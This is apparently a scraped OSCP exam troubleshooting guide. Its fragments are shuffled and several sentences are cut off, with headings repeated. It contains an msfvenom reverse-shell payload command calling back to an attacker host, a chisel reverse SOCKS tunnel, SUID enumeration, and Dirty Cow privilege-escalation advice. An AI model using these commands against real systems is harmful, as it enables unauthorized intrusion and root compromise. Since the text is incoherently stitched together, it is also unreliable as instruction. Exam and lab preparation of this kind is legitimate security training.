msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.x.x.x LPORT=443 -f elf -e x86/shikata_ga_nai -i 5 -o shell If you truly need kiwi or mimikatz , use the multi/handler but don't use the exploit module. Generate the payload manually, then start the handler separately. This is allowed and a legit OSCP fix. Part 3: Privilege Escalation – The "Broken Exploit" Fix You found the vulnerability. You compiled the exploit. It says Success but you are still www-data . Why? The OSCP environment is older, but the patches are weird. The Linux Privilege Escalation Fixes Problem: Dirty Cow (CVE-2016-5195) compiles but doesn't give root. Fix: Try a different PoC. The default dirty.c often fails on OSCP machines. Use dirtycow.c from FireFart or the dcow variant.
# List SUID binaries find / -perm -4000 2>/dev/null # Check if the binary is actually executable by you ./binary --help Kernel exploit compiles with gcc but fails. Fix: The OSCP machines usually lack modern GCC. Compile on your Kali with static linking:
You have 23 hours and 45 minutes left on the exam clock. Your buffer overflow is ready, your reverse shell is staged, but the connection dies. The exploit runs locally but fails remotely. Panic sets in. offensive security oscp fix
msfupdate # Or if broken: cd /opt/metasploit-framework/embedded/bin/ ./msfupdate searchsploit gives you an exploit that doesn't compile. The Fix: Use the Raw version from Exploit-DB. searchsploit -m 45458 moves it to your local directory. Then manually check the header—many Exploit-DB scripts have hardcoded IPs or broken offsets.
./chisel client YOUR_KALI_IP:8000 R:socks You now have a SOCKS proxy on 127.0.0.1:1080 . Route proxychains through it. The Proxychains Config Fix Edit /etc/proxychains4.conf : msfvenom -p linux/x86/shell_reverse_tcp LHOST=10
Metasploit throws Unable to find payload or Exploit failed: NoMethodError . The Fix: Update Metasploit, but not the whole OS.
Now go get that shell. And when it breaks, you know exactly how to fix it. Disclaimer: This guide is for authorized penetration testing and OSCP exam preparation only. Always follow the Offensive Security exam guidelines. Part 3: Privilege Escalation – The "Broken Exploit"
If this scenario sounds familiar, you are not looking for a "cheat sheet." You are looking for an —a surgical solution to the unique technical horrors that the OSCP labs and exam environment throw at you.